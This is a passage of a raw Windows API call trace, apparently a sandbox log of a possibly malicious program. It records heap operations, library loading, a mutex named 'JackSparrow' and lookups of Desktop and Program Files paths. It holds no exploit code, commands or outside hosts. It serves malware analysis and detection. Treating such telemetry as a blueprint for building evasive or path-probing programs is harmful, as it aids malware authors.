lpMsg=0x6af2ac) returned 0 [0026.286] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.286] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.286] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.286] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.286] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.287] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0026.287] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0026.287] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="JackSparrow") returned 0x11c [0026.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af218 [0026.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7d4140 [0026.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889340 [0026.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889358 [0026.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889370 [0026.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889388 [0026.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1c8 [0026.288] FreeLibrary (hLibModule=0x76e10000) returned 1 [0026.288] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1a8 [0026.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7d4360 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1b8 [0026.289] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0838 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892f8 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1a8 [0026.289] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889238 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1e8 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1d8 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889250 [0026.289] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889250 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1d8 [0026.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetLastError", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0026.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd) returned 0x889238 [0026.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetLastError", cchWideChar=13, lpMultiByteStr=0x889238, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetLastError", lpUsedDefaultChar=0x0) returned 13 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889238 | out: hHeap=0x770000) returned 1 [0026.290] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889250 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1d8 | out: hHeap=0x770000) returned 1 [0026.290] GetLastError () returned 0x0 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1d8 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7d4360 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1e8 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889250 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889238 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889208 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af208 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889208 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af208 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889238 | out: hHeap=0x770000) returned 1 [0026.290] FreeLibrary (hLibModule=0x76e10000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889268 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1f8 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892c8 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889310 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892b0 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892e0 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889280 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b08b0 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1b8 | out: hHeap=0x770000) returned 1 [0026.290] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1b8 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7d4580 [0026.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1f8 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d4580 | out: hHeap=0x770000) returned 1 [0026.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1f8 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1b8 | out: hHeap=0x770000) returned 1 [0026.291] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1b8 [0026.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1f8 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1f8 | out: hHeap=0x770000) returned 1 [0026.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1f8 [0026.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae748 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae748 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1f8 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1b8 | out: hHeap=0x770000) returned 1 [0026.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed1e8 [0026.291] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ed1e8 | out: hHeap=0x770000) returned 1 [0026.291] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af2ac) returned 0 [0026.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1b8 [0026.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1f8 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1f8 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1b8 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab1d0 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889148 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab218 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af178 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b07c0 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889100 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af158 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0770 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889160 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88df60 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af188 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b07e8 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8890e8 | out: hHeap=0x770000) returned 1 [0026.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8890d0 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0748 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af148 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0720 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889130 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88df28 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af168 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0798 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889250 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1e8 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d4360 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1d8 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892f8 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0888 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1a8 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0838 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889358 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889370 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889388 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0860 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1c8 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893b8 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893a0 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889340 | out: hHeap=0x770000) returned 1 [0026.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d4140 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af218 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889178 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889190 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af198 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0810 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8890b8 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af128 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af138 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b06d0 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889088 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889070 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8890a0 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b06f8 | out: hHeap=0x770000) returned 1 [0026.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af138 [0026.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae748 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae748 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af138 | out: hHeap=0x770000) returned 1 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af118 | out: hHeap=0x770000) returned 1 [0026.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed1e8 [0026.293] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ed1e8 | out: hHeap=0x770000) returned 1 [0026.293] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b06f8 [0026.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8890a0 [0026.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af118 [0026.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8890a0 | out: hHeap=0x770000) returned 1 [0026.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b06d0 [0026.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8890a0 [0026.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889070 [0026.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af138 [0026.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889070 | out: hHeap=0x770000) returned 1 [0026.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0810 [0026.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889070 [0026.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af128 [0026.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b4130 [0026.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af198 [0026.294] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x6aece0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0026.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889088 [0026.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af128 | out: hHeap=0x770000) returned 1 [0026.295] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x69f344, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0026.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af128 [0026.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88df60 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8890b8 [0026.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4130 | out: hHeap=0x770000) returned 1 [0026.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af198 | out: hHeap=0x770000) returned 1 [0026.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889088 | out: hHeap=0x770000) returned 1 [0026.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889070 | out: hHeap=0x770000) returned 1 [0026.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0810 | out: hHeap=0x770000) returned 1 [0026.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af138 | out: hHeap=0x770000) returned 1 [0026.296] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0810 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889070 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af138 [0026.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889070 | out: hHeap=0x770000) returned 1 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0838 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889070 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889088 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af198 [0026.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889088 | out: hHeap=0x770000) returned 1 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0888 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889088 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af218 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b4130 [0026.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1c8 [0026.296] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x6aece0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0026.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889340 [0026.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af218 | out: hHeap=0x770000) returned 1 [0026.298] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x69f344, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af218 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab218 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8893a0 [0026.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4130 | out: hHeap=0x770000) returned 1 [0026.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1c8 | out: hHeap=0x770000) returned 1 [0026.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889340 | out: hHeap=0x770000) returned 1 [0026.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889088 | out: hHeap=0x770000) returned 1 [0026.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0888 | out: hHeap=0x770000) returned 1 [0026.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af198 | out: hHeap=0x770000) returned 1 [0026.298] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0888 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889088 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af198 [0026.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889088 | out: hHeap=0x770000) returned 1 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0798 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889088 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889340 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1c8 [0026.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889340 | out: hHeap=0x770000) returned 1 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0720 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889340 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1a8 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b4130 [0026.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1d8 [0026.299] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aece0 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0026.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8893b8 [0026.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1a8 | out: hHeap=0x770000) returned 1 [0026.300] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", lpszShortPath=0x69f344, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1a8 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b07e8 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889388 [0026.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4130 | out: hHeap=0x770000) returned 1 [0026.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1d8 | out: hHeap=0x770000) returned 1 [0026.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893b8 | out: hHeap=0x770000) returned 1 [0026.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889340 | out: hHeap=0x770000) returned 1 [0026.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0720 | out: hHeap=0x770000) returned 1 [0026.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1c8 | out: hHeap=0x770000) returned 1 [0026.300] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0720 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889340 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1c8 [0026.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889340 | out: hHeap=0x770000) returned 1 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0770 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889340 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8893b8 